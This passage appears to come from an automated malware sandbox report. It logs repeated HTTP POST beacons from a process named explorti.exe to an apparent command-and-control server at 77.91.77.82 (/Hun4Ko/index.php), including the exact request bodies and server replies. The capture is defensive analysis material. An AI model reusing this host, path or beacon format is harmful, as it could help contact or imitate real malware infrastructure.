                    Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 45 42 35 32 45 37 35 42 34 35 44 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                    Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7EB52E75B45D82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                    Jul 5, 2024 05:10:29.146338940 CEST196INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 05 Jul 2024 03:10:29 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    24192.168.2.44976177.91.77.82808152C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                    TimestampBytes transferredDirectionData
                    Jul 5, 2024 05:10:29.254751921 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 77.91.77.82
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Jul 5, 2024 05:10:29.966687918 CEST219INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 05 Jul 2024 03:10:29 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Jul 5, 2024 05:10:29.967524052 CEST303OUTPOST /Hun4Ko/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 77.91.77.82
                    Content-Length: 154
                    Cache-Control: no-cache
                    Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 45 42 35 32 45 37 35 42 34 35 44 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                    Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7EB52E75B45D82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                    Jul 5, 2024 05:10:30.189443111 CEST196INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 05 Jul 2024 03:10:30 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    25192.168.2.44976277.91.77.82808152C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                    TimestampBytes transferredDirectionData
                    Jul 5, 2024 05:10:30.301451921 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 77.91.77.82
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Jul 5, 2024 05:10:31.029006958 CEST219INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 05 Jul 2024 03:10:30 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Jul 5, 2024 05:10:31.031476021 CEST303OUTPOST /Hun4Ko/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 77.91.77.82
                    Content-Length: 154
                    Cache-Control: no-cache
                    Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 45 42 35 32 45 37 35 42 34 35 44 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                    Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7EB52E75B45D82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                    Jul 5, 2024 05:10:31.258886099 CEST196INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 05 Jul 2024 03:10:31 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    26192.168.2.44976377.91.77.82808152C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                    TimestampBytes transferredDirectionData
                    Jul 5, 2024 05:10:31.378473043 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 77.91.77.82
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Jul 5, 2024 05:10:32.081392050 CEST219INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 05 Jul 2024 03:10:31 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Jul 5, 2024 05:10:32.082113028 CEST303OUTPOST /Hun4Ko/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 77.91.77.82
                    Content-Length: 154
                    Cache-Control: no-cache
                    Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 45 42 35 32 45 37 35 42 34 35 44 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                    Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7EB52E75B45D82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                    Jul 5, 2024 05:10:32.302418947 CEST196INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 05 Jul 2024 03:10:32 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    27192.168.2.44976477.91.77.82808152C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                    TimestampBytes transferredDirectionData
                    Jul 5, 2024 05:10:32.410147905 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 77.91.77.82
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Jul 5, 2024 05:10:33.105979919 CEST219INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 05 Jul 2024 03:10:32 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Jul 5, 2024 05:10:33.107883930 CEST303OUTPOST /Hun4Ko/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 77.91.77.82
                    Content-Length: 154
                    Cache-Control: no-cache
                    Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 45 42 35 32 45 37 35 42 34 35 44 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                    Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7EB52E75B45D82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                    Jul 5, 2024 05:10:33.325151920 CEST196INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 05 Jul 2024 03:10:33 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    28192.168.2.44976577.91.77.82808152C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                    TimestampBytes transferredDirectionData
                    Jul 5, 2024 05:10:33.441559076 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 77.91.77.82
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Jul 5, 2024 05:10:34.161181927 CEST219INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 05 Jul 2024 03:10:34 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Jul 5, 2024 05:10:34.163031101 CEST303OUTPOST /Hun4Ko/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 77.91.77.82
                    Content-Length: 154
                    Cache-Control: no-cache
                    Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 45 42 35 32 45 37 35 42 34 35 44 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                    Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7EB52E75B45D82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                    Jul 5, 2024 05:10:34.385121107 CEST196INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 05 Jul 2024 03:10:34 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    29192.168.2.44976677.91.77.82808152C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                    TimestampBytes transferredDirectionData
                    Jul 5, 2024 05:10:34.518975973 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 77.91.77.82
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Jul 5, 2024 05:10:35.233439922 CEST219INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 05 Jul 2024 03:10:35 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Jul 5, 2024 05:10:35.234164000 CEST303OUTPOST /Hun4Ko/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 77.91.77.82
                    Content-Length: 154
                    Cache-Control: no-cache
                    Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 45 42 35 32 45 37 35 42 34 35 44 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                    Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7EB52E75B45D82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                    Jul 5, 2024 05:10:35.455430031 CEST196INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 05 Jul 2024 03:10:35 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    30192.168.2.44976777.91.77.82808152C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                    TimestampBytes transferredDirectionData
                    Jul 5, 2024 05:10:35.567018986 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 77.91.77.82
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Jul 5, 2024 05:10:36.296036005 CEST219INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 05 Jul 2024 03:10:36 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Jul 5, 2024 05:10:36.296833992 CEST303OUTPOST /Hun4Ko/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 77.91.77.82
                    Content-Length: 154
                    Cache-Control: no-cache
                    Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 45 42 35 32 45 37 35 42 34 35 44 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                    Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7EB52E75B45D82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                    Jul 5, 2024 05:10:36.525865078 CEST196INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 05 Jul 2024 03:10:36 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    31192.168.2.44976877.91.77.82808152C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                    TimestampBytes transferredDirectionData
                    Jul 5, 2024 05:10:36.644284964 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 77.91.77.82
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Jul 5, 2024 05:10:37.352226019 CEST219INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 05 Jul 2024 03:10:37 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Jul 5, 2024 05:10:37.355459929 CEST303OUTPOST /Hun4Ko/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 77.91.77.82
                    Content-Length: 154
                    Cache-Control: no-cache
                    Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 45 42 35 32 45 37 35 42 34 35 44 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                    Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7EB52E75B45D82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                    Jul 5, 2024 05:10:37.576417923 CEST196INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 05 Jul 2024 03:10:37 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    32192.168.2.44976977.91.77.82808152C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                    TimestampBytes transferredDirectionData
                    Jul 5, 2024 05:10:37.696398973 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 77.91.77.82
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Jul 5, 2024 05:10:38.414021015 CEST219INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 05 Jul 2024 03:10:38 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Jul 5, 2024 05:10:38.414747000 CEST303OUTPOST /Hun4Ko/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 77.91.77.82
                    Content-Length: 154
                    Cache-Control: no-cache
                    Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 45 42 35 32 45 37 35 42 34 35 44 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                    Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7EB52E75B45D82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                    Jul 5, 2024 05:10:38.641179085 CEST196INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 05 Jul 2024 03:10:38 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    33192.168.2.44977077.91.77.82808152C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                    TimestampBytes transferredDirectionData
                    Jul 5, 2024 05:10:38.754026890 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 77.91.77.82
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Jul 5, 2024 05:10:39.447379112 CEST219INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 05 Jul 2024 03:10:39 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Jul 5, 2024 05:10:39.448174953 CEST303OUTPOST /Hun4Ko/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 77.91.77.82
                    Content-Length: 154
                    Cache-Control: no-cache
                    Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 45 42 35 32 45 37 35 42 34 35 44 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                    Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7EB52E75B45D82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                    Jul 5, 2024 05:10:39.665680885 CEST196INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 05 Jul 2024 03:10:39 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    34192.168.2.44977177.91.77.82808152C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                    TimestampBytes transferredDirectionData
                    Jul 5, 2024 05:10:39.785593033 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 77.91.77.82
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Jul 5, 2024 05:10:40.485183001 CEST219INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 05 Jul 2024 03:10:40 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Jul 5, 2024 05:10:40.486037016 CEST303OUTPOST /Hun4Ko/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 77.91.77.82
                    Content-Length: 154
                    Cache-Control: no-cache
                    Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 45 42 35 32 45 37 35 42 34 35 44 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                    Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7EB52E75B45D82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                    Jul 5, 2024 05:10:40.705621958 CEST196INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 05 Jul 2024 03:10:40 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    35192.168.2.44977277.91.77.82808152C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                    TimestampBytes transferredDirectionData
                    Jul 5, 2024 05:10:40.816066027 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 77.91.77.82
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Jul 5, 2024 05:10:41.529180050 CEST219INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 05 Jul 2024 03:10:41 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Jul 5, 2024 05:10:41.529983044 CEST303OUTPOST /Hun4Ko/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 77.91.77.82
                    Content-Length: 154
                    Cache-Control: no-cache
